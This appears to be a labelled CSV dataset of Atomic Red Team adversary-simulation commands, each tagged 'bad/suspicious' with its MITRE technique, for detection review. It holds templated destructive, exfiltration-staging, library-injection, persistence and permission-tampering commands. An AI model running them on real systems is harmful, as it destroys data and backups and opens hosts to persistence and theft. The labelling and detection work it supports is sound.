drive,T1485,"[""T1485""]",windows,0.9,False,"RansomEXX malware removes all deleted files using windows built-in cipher.exe to prevent forensic recover. This process is very slow and test execution may timeout. https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware https://support.microsoft.com/en-us/topic/cipher-exe-security-tool-for-the-encrypting-file-system-56c85edd-85cf-ac07-f2f7-ca2d35dab7e4 ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3c4921eab5696221528de678,gcloud config set project #{project_id} gcloud storage buckets delete gs://#{bucket_name},gcloud config set project #{project_id} gcloud storage buckets delete gs://#{bucket_name},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1485/T1485.yaml,GCP - Delete Bucket,T1485,"[""T1485""]",iaas:gcp,0.9,False,"This Atomic will create a Google Storage Bucket then delete it. The idea for this Atomic came from a Rule published by the Elastic team. Identifies when a Google Cloud Platform (GCP) storage bucket is deleted. An adversary may delete a storage bucket in order to disrupt their target's business operations. This atomic will create a bucket then delete the bucket. Reference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/impact_gcp_storage_bucket_deleted.toml ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2928569c3b75874014529199,"cd ""$PathToAtomicsFolder/T1485/src/T1485-4/"" terraform state rm google_storage_bucket.bucket terraform destroy -auto-approve","cd ""$PathToAtomicsFolder/T1485/src/T1485-4/"" terraform state rm google_storage_bucket.bucket terraform destroy -auto-approve",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1485/T1485.yaml,GCP - Delete Bucket,T1485,"[""T1485""]",iaas:gcp,0.55,True,"This Atomic will create a Google Storage Bucket then delete it. The idea for this Atomic came from a Rule published by the Elastic team. Identifies when a Google Cloud Platform (GCP) storage bucket is deleted. An adversary may delete a storage bucket in order to disrupt their target's business operations. This atomic will create a bucket then delete the bucket. Reference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/impact_gcp_storage_bucket_deleted.toml ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b4988cabb9df371b5ca1c842,"echo """" | ""#{plink_file}"" -batch ""#{vm_host}"" -ssh -l #{vm_user} -pw ""#{vm_pass}"" ""for i in `vim-cmd vmsvc/getallvms | awk 'NR>1 {print $1}'`; do vim-cmd vmsvc/snapshot.removeall $i & done""","echo """" | ""#{plink_file}"" -batch ""#{vm_host}"" -ssh -l #{vm_user} -pw ""#{vm_pass}"" ""for i in `vim-cmd vmsvc/getallvms | awk 'NR>1 {print $1}'`; do vim-cmd vmsvc/snapshot.removeall $i & done""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1485/T1485.yaml,ESXi - Delete VM Snapshots,T1485,"[""T1485""]",windows,0.9,False,"Deletes all snapshots for all Virtual Machines on an ESXi Host [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#inhibit%20recovery) ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 00a40f5765785d27f4848662,"""#{rar_exe}"" a -r #{output_file} #{input_path}\*#{file_extension}","""#{rar_exe}"" a -r #{output_file} #{input_path}\*#{file_extension}",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1560.001/T1560.001.yaml,Compress Data for Exfiltration With Rar,T1560.001,"[""T1560.001""]",windows,0.9,False,"An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. When the test completes you should find the txt files from the %USERPROFILE% directory compressed in a file called T1560.001-data.rar in the %USERPROFILE% directory ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7590b2277a8f62031e44fe45,del /f /q /s #{output_file} >nul 2>&1,del /f /q /s #{output_file} >nul 2>&1,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1560.001/T1560.001.yaml,Compress Data for Exfiltration With Rar,T1560.001,"[""T1560.001""]",windows,0.55,True,"An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. When the test completes you should find the txt files from the %USERPROFILE% directory compressed in a file called T1560.001-data.rar in the %USERPROFILE% directory ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d72ee72e9a2608aaf8a1b32d,"mkdir .\tmp\victim-files cd .\tmp\victim-files echo ""This file will be encrypted"" > .\encrypted_file.txt ""#{rar_exe}"" a -hp""blue"" hello.rar dir","mkdir .\tmp\victim-files cd .\tmp\victim-files echo ""This file will be encrypted"" > .\encrypted_file.txt ""#{rar_exe}"" a -hp""blue"" hello.rar dir",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1560.001/T1560.001.yaml,Compress Data and lock with password for Exfiltration with winrar,T1560.001,"[""T1560.001""]",windows,0.9,False,"Note: Requires winrar installation rar a -p""blue"" hello.rar (VARIANT) ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 31bd033882be4da0ef32b122,"path=%path%;""C:\Program Files (x86)\winzip"" mkdir .\tmp\victim-files cd .\tmp\victim-files echo ""This file will be encrypted"" > .\encrypted_file.txt ""#{winzip_exe}"" -min -a -s""hello"" archive.zip * dir","path=%path%;""C:\Program Files (x86)\winzip"" mkdir .\tmp\victim-files cd .\tmp\victim-files echo ""This file will be encrypted"" > .\encrypted_file.txt ""#{winzip_exe}"" -min -a -s""hello"" archive.zip * dir",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1560.001/T1560.001.yaml,Compress Data and lock with password for Exfiltration with winzip,T1560.001,"[""T1560.001""]",windows,0.9,False,"Note: Requires winzip installation wzzip sample.zip -s""blueblue"" *.txt (VARIANT) ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 132de0e8606550891d2b5fa6,"mkdir $PathToAtomicsFolder\T1560.001\victim-files cd $PathToAtomicsFolder\T1560.001\victim-files echo ""This file will be encrypted"" > .\encrypted_file.txt ""#{7zip_exe}"" u archive.7z *txt -pblue dir","mkdir $PathToAtomicsFolder\T1560.001\victim-files cd $PathToAtomicsFolder\T1560.001\victim-files echo ""This file will be encrypted"" > .\encrypted_file.txt ""#{7zip_exe}"" u archive.7z *txt -pblue dir",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1560.001/T1560.001.yaml,Compress Data and lock with password for Exfiltration with 7zip,T1560.001,"[""T1560.001""]",windows,0.9,False,"Note: This test requires 7zip installation ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d48b240767efabc528ee79f6,rmdir /s /Q $PathToAtomicsFolder\T1560.001\victim-files >nul 2>&1,rmdir /s /Q $PathToAtomicsFolder\T1560.001\victim-files >nul 2>&1,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1560.001/T1560.001.yaml,Compress Data and lock with password for Exfiltration with 7zip,T1560.001,"[""T1560.001""]",windows,0.55,True,"Note: This test requires 7zip installation ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8065f8a8ffad54bc7f89e04d,zip #{output_file} #{input_files},zip #{output_file} #{input_files},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1560.001/T1560.001.yaml,Data Compressed - nix - zip,T1560.001,"[""T1560.001""]","linux,macos",0.9,False,"An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7c1fcfbbd2d642d87f02463c,rm -f #{output_file},rm -f #{output_file},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1560.001/T1560.001.yaml,Data Compressed - nix - zip,T1560.001,"[""T1560.001""]","linux,macos",0.55,True,"An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d7f42090dc45ddf7053605b8,test -e #{input_file} && gzip -k #{input_file} || (echo '#{input_content}' >> #{input_file}; gzip -k #{input_file}),test -e #{input_file} && gzip -k #{input_file} || (echo '#{input_content}' >> #{input_file}; gzip -k #{input_file}),bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1560.001/T1560.001.yaml,Data Compressed - nix - gzip Single File,T1560.001,"[""T1560.001""]","linux,macos",0.9,False,"An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5cf63499d8fa45f3452b5841,rm -f #{input_file}.gz,rm -f #{input_file}.gz,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1560.001/T1560.001.yaml,Data Compressed - nix - gzip Single File,T1560.001,"[""T1560.001""]","linux,macos",0.55,True,"An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 22298d73f9b4ce642a426482,tar -cvzf #{output_file} #{input_file_folder},tar -cvzf #{output_file} #{input_file_folder},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1560.001/T1560.001.yaml,Data Compressed - nix - tar Folder or File,T1560.001,"[""T1560.001""]","linux,macos",0.9,False,"An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e0374a819000772ba8dbc167,"mkdir -p #{test_folder} cd #{test_folder}; touch a b c d e f g zip --password ""#{encryption_password}"" #{test_folder}/#{test_file} ./* echo ""#{encryption_password}"" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/#{test_file}.zip.gpg -c #{test_folder}/#{test_file}.zip ls -l #{test_folder}","mkdir -p #{test_folder} cd #{test_folder}; touch a b c d e f g zip --password ""#{encryption_password}"" #{test_folder}/#{test_file} ./* echo ""#{encryption_password}"" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/#{test_file}.zip.gpg -c #{test_folder}/#{test_file}.zip ls -l #{test_folder}",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1560.001/T1560.001.yaml,Data Encrypted with zip and gpg symmetric,T1560.001,"[""T1560.001""]","linux,macos",0.9,False,"Encrypt data for exiltration ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d054d7e622ca158bafd1eb19,rm -Rf #{test_folder},rm -Rf #{test_folder},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1560.001/T1560.001.yaml,Data Encrypted with zip and gpg symmetric,T1560.001,"[""T1560.001""]","linux,macos",0.55,True,"Encrypt data for exiltration ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9cbcbe796da276aaa49b0bd1,zip -r #{input_folder}/#{input_file}.zip #{input_folder} openssl enc -aes-256-cbc -pass pass:#{enc_pass} -p -in #{input_folder}/#{input_file}.zip -out #{input_folder}/#{input_file}.enc cat #{input_folder}/#{input_file}.enc | base64,zip -r #{input_folder}/#{input_file}.zip #{input_folder} openssl enc -aes-256-cbc -pass pass:#{enc_pass} -p -in #{input_folder}/#{input_file}.zip -out #{input_folder}/#{input_file}.enc cat #{input_folder}/#{input_file}.enc | base64,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1560.001/T1560.001.yaml,Encrypts collected data with AES-256 and Base64,T1560.001,"[""T1560.001""]","linux,macos",0.9,False,"An adversary may compress all the collected data, encrypt and send them to a C2 server using base64 encoding. This atomic test tries to emulate the behaviour of the FLEXIROOT backdoor to archive the collected data. FLEXIROOT typically utilizes AES encryption and base64 encoding to transfer the encrypted data to the C2 server. In this test, standard zip compression and the OpenSSL library are used to encrypt the compressed data. https://attack.mitre.org/versions/v7/software/S0267/",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b54c10d8c86862b62b06d953,rm -rf #{input_folder},rm -rf #{input_folder},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1560.001/T1560.001.yaml,Encrypts collected data with AES-256 and Base64,T1560.001,"[""T1560.001""]","linux,macos",0.55,True,"An adversary may compress all the collected data, encrypt and send them to a C2 server using base64 encoding. This atomic test tries to emulate the behaviour of the FLEXIROOT backdoor to archive the collected data. FLEXIROOT typically utilizes AES encryption and base64 encoding to transfer the encrypted data to the C2 server. In this test, standard zip compression and the OpenSSL library are used to encrypt the compressed data. https://attack.mitre.org/versions/v7/software/S0267/",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a3fde261c02a572aca014157,# Re-add the initially extracted IP #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m c:\temp\loghost_ip.txt rm c:\temp\loghost_ip.txt rm c:\temp\loghost.txt,# Re-add the initially extracted IP #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m c:\temp\loghost_ip.txt rm c:\temp\loghost_ip.txt rm c:\temp\loghost.txt,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1560.001/T1560.001.yaml,ESXi - Remove Syslog remote IP,T1560.001,"[""T1560.001""]",windows,0.55,True,"An adversary may edit the syslog config to remove the loghost in order to prevent or redirect logs being received by SIEM. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1e0128ac528eae02afb836c7,makecab.exe #{input_file} #{output_file},makecab.exe #{input_file} #{output_file},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1560.001/T1560.001.yaml,Compress a File for Exfiltration using Makecab,T1560.001,"[""T1560.001""]",windows,0.9,False,"An adversary may compress data using Makecab (in-built Windows binary) that is collected prior to exfiltration. [reference](https://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/) ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 677ff3b1d8a572a494c624fb,del #{output_file},del #{output_file},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1560.001/T1560.001.yaml,Compress a File for Exfiltration using Makecab,T1560.001,"[""T1560.001""]",windows,0.55,True,"An adversary may compress data using Makecab (in-built Windows binary) that is collected prior to exfiltration. [reference](https://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/) ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0a02d855b8072fb7dff61d0e,sudo sh -c 'echo #{path_to_shared_library} > /etc/ld.so.preload',sudo sh -c 'echo #{path_to_shared_library} > /etc/ld.so.preload',bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1574.006/T1574.006.yaml,Shared Library Injection via /etc/ld.so.preload,T1574.006,"[""T1574.006""]",linux,0.9,False,"This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. Upon successful execution, bash will echo `../bin/T1574.006.so` to /etc/ld.so.preload. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 249583a9c0b77a8e039aac56,sudo sed -i 's##{path_to_shared_library}##' /etc/ld.so.preload,sudo sed -i 's##{path_to_shared_library}##' /etc/ld.so.preload,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1574.006/T1574.006.yaml,Shared Library Injection via /etc/ld.so.preload,T1574.006,"[""T1574.006""]",linux,0.55,True,"This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. Upon successful execution, bash will echo `../bin/T1574.006.so` to /etc/ld.so.preload. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 083784513ebd91923e179a78,LD_PRELOAD=#{path_to_shared_library} ls,LD_PRELOAD=#{path_to_shared_library} ls,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1574.006/T1574.006.yaml,Shared Library Injection via LD_PRELOAD,T1574.006,"[""T1574.006""]",linux,0.9,False,"This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a703c40722d484713d7879de,DYLD_INSERT_LIBRARIES=#{dylib_file} #{file_to_inject},DYLD_INSERT_LIBRARIES=#{dylib_file} #{file_to_inject},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1574.006/T1574.006.yaml,Dylib Injection via DYLD_INSERT_LIBRARIES,T1574.006,"[""T1574.006""]",macos,0.9,False,"injects a dylib that opens calculator via env variable ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b6ab616f11751551f0172718,kill `pgrep Calculator` kill `pgrep firefox`,kill `pgrep Calculator` kill `pgrep firefox`,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1574.006/T1574.006.yaml,Dylib Injection via DYLD_INSERT_LIBRARIES,T1574.006,"[""T1574.006""]",macos,0.55,True,"injects a dylib that opens calculator via env variable ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4a01b513a7514c4e29b826ec,"New-Item ""HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components"" -Name ""atomic_test"" -Force Set-ItemProperty ""HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test"" ""(Default)"" ""ART TEST"" -Force Set-ItemProperty ""HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test"" ""StubPath"" ""#{payload}"" -Force & $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup","New-Item ""HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components"" -Name ""atomic_test"" -Force Set-ItemProperty ""HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test"" ""(Default)"" ""ART TEST"" -Force Set-ItemProperty ""HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test"" ""StubPath"" ""#{payload}"" -Force & $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.014/T1547.014.yaml,HKLM - Add atomic_test key to launch executable as part of user setup,T1547.014,"[""T1547.014""]",windows,0.9,False,"This test will create an ""atomic_test"" key under 'HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components' to launch calc by configuring an active setup executable and forcing to run active setup using the ""runonce.exe /AlternateShellStartup"" command. Without the ""runonce.exe /AlternateShellStartup"" command it would run during the next logon for each user. Note: If you logout before running the cleanup command, you will be required to go through the OOBE (out-of-box experience) setup seque",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4195c3219acb724fba8c074b,"Remove-Item ""HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test"" -Force -ErrorAction Ignore Remove-Item ""HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test"" -Force -ErrorAction Ignore","Remove-Item ""HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test"" -Force -ErrorAction Ignore Remove-Item ""HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test"" -Force -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.014/T1547.014.yaml,HKLM - Add atomic_test key to launch executable as part of user setup,T1547.014,"[""T1547.014""]",windows,0.55,True,"This test will create an ""atomic_test"" key under 'HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components' to launch calc by configuring an active setup executable and forcing to run active setup using the ""runonce.exe /AlternateShellStartup"" command. Without the ""runonce.exe /AlternateShellStartup"" command it would run during the next logon for each user. Note: If you logout before running the cleanup command, you will be required to go through the OOBE (out-of-box experience) setup seque",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6448f0c863fa83967d617e2e,"Set-ItemProperty ""HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}"" ""StubPath"" ""#{payload}"" -Force & $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup","Set-ItemProperty ""HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}"" ""StubPath"" ""#{payload}"" -Force & $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.014/T1547.014.yaml,HKLM - Add malicious StubPath value to existing Active Setup Entry,T1547.014,"[""T1547.014""]",windows,0.9,False,"This test will add a StubPath entry to the Active Setup native registry key associated with 'Internet Explorer Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600}) Said key doesn't have a StubPath value by default, by adding one it will launch calc by forcing to run active setup using runonce.exe /AlternateShellStartup. Without the last command it will normally run on next user logon. Note: this test will only run once successfully if no cleanup command is run in between test. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e61abe4a0bb36d7b137d070c,"Remove-ItemProperty ""HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}"" -Name ""StubPath"" -Force Remove-ItemProperty ""HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}"" -Name ""Version"" -Force","Remove-ItemProperty ""HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}"" -Name ""StubPath"" -Force Remove-ItemProperty ""HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}"" -Name ""Version"" -Force",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.014/T1547.014.yaml,HKLM - Add malicious StubPath value to existing Active Setup Entry,T1547.014,"[""T1547.014""]",windows,0.55,True,"This test will add a StubPath entry to the Active Setup native registry key associated with 'Internet Explorer Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600}) Said key doesn't have a StubPath value by default, by adding one it will launch calc by forcing to run active setup using runonce.exe /AlternateShellStartup. Without the last command it will normally run on next user logon. Note: this test will only run once successfully if no cleanup command is run in between test. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9f5e23b46bc9c3b94d894fc1,"Set-ItemProperty -Path ""HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}"" -Name ""Version"" -Value ""0,0,0,0"" & $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup","Set-ItemProperty -Path ""HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}"" -Name ""Version"" -Value ""0,0,0,0"" & $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.014/T1547.014.yaml,HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number,T1547.014,"[""T1547.014""]",windows,0.9,False,"This test will decrease the version number of the 'Internet Explorer Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600}) registry key for the current user, which will force the StubPath payload (if set) to execute. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ca54001a1ca87777bed50a32,takeown.exe /f #{file_folder_to_own} /r,takeown.exe /f #{file_folder_to_own} /r,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1222.001/T1222.001.yaml,Take ownership using takeown utility,T1222.001,"[""T1222.001""]",windows,0.9,False,"Modifies the filesystem permissions of the specified file or folder to take ownership of the object. Upon execution, ""SUCCESS"" will be displayed for the folder and each file inside of it. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d82b3a90bd06777e495639d9,icacls.exe #{file_or_folder} /grant #{user_or_group}:F,icacls.exe #{file_or_folder} /grant #{user_or_group}:F,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1222.001/T1222.001.yaml,cacls - Grant permission to specified user or group recursively,T1222.001,"[""T1222.001""]",windows,0.9,False,"Modifies the filesystem permissions of the specified folder and contents to allow the specified user or group Full Control. If ""Access is denied"" is displayed it may be because the file or folder doesn't exit. Run the prereq command to create it. Upon successfull execution, ""Successfully processed 3 files"" will be displayed. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1cbd57d592e439e373bbec01,attrib.exe -r #{file_or_folder}\*.* /s,attrib.exe -r #{file_or_folder}\*.* /s,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1222.001/T1222.001.yaml,attrib - Remove read-only attribute,T1222.001,"[""T1222.001""]",windows,0.9,False,"Removes the read-only attribute from a file or folder using the attrib.exe command. Upon execution, no output will be displayed. Open the file in File Explorer > Right Click - Prperties and observe that the Read Only checkbox is empty. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b51f2fc0b3a858498a96abbd,mkdir #{file_or_folder} >nul 2>&1 echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt echo T1222.001_attrib2 >> #{file_or_folder}\T1222.001_attrib2.txt attrib.exe +h #{file_or_folder}\T1222.001_attrib1.txt attrib.exe +h #{file_or_folder}\T1222.001_attrib2.txt,mkdir #{file_or_folder} >nul 2>&1 echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt echo T1222.001_attrib2 >> #{file_or_folder}\T1222.001_attrib2.txt attrib.exe +h #{file_or_folder}\T1222.001_attrib1.txt attrib.exe +h #{file_or_folder}\T1222.001_attrib2.txt,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1222.001/T1222.001.yaml,attrib - hide file,T1222.001,"[""T1222.001""]",windows,0.9,False,"Attackers leverage an existing Windows binary, attrib.exe, to mark specific files or folder as hidden by using specific flags so that the victim does not see the file. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7c351cd148a1ff5416ccae2b,del /A:H #{file_or_folder}\T1222.001_attrib*.txt >nul 2>&1,del /A:H #{file_or_folder}\T1222.001_attrib*.txt >nul 2>&1,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1222.001/T1222.001.yaml,attrib - hide file,T1222.001,"[""T1222.001""]",windows,0.55,True,"Attackers leverage an existing Windows binary, attrib.exe, to mark specific files or folder as hidden by using specific flags so that the victim does not see the file. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 15b063cb1eba13d11723d9ef,"icacls ""#{path}"" /grant Everyone:F /T /C /Q","icacls ""#{path}"" /grant Everyone:F /T /C /Q",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1222.001/T1222.001.yaml,Grant Full Access to folder for Everyone - Ryuk Ransomware Style,T1222.001,"[""T1222.001""]",windows,0.9,False,"Invokes the command line similar to that used by Ryuk Ransomware to grant full access to the entire C:\ drive for Everyone. **icacls ""C:\*"" /grant Everyone:F /T /C /Q** However, for this atomic we set the permission on C:\Users\Public so it completes faster and doesn't irreversibly affect the host. You can set your own path variable to ""C:\*"" if you prefer. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ca75196bfb082bbd3a37d0e7,icacls '#{path}' /restore #{file_path} /q >nul 2>&1,icacls '#{path}' /restore #{file_path} /q >nul 2>&1,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1222.001/T1222.001.yaml,Grant Full Access to folder for Everyone - Ryuk Ransomware Style,T1222.001,"[""T1222.001""]",windows,0.55,True,"Invokes the command line similar to that used by Ryuk Ransomware to grant full access to the entire C:\ drive for Everyone. **icacls ""C:\*"" /grant Everyone:F /T /C /Q** However, for this atomic we set the permission on C:\Users\Public so it completes faster and doesn't irreversibly affect the host. You can set your own path variable to ""C:\*"" if you prefer. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 980d9830063b449aa58677bd,"""C:\Program Files (x86)\Windows Resource Kits\Tools\subinacl.exe""","""C:\Program Files (x86)\Windows Resource Kits\Tools\subinacl.exe""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1222.001/T1222.001.yaml,SubInAcl Execution,T1222.001,"[""T1222.001""]",windows,0.9,False,"This test simulates an adversary executing the Windows Resource kit utility SubInAcl. This utility was abused by adversaries in the past in order to modify access permissions. Upon execution, a process creation log should be generated indicating successful execution.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a5ccf80a7423381316db0ee4,"$buffer = New-Object byte[] 11 $handle = New-Object IO.FileStream ""\\.\#{volume}"", 'Open', 'Read', 'ReadWrite' $handle.Read($buffer, 0, $buffer.Length) $handle.Close() Format-Hex -InputObject $buffer","$buffer = New-Object byte[] 11 $handle = New-Object 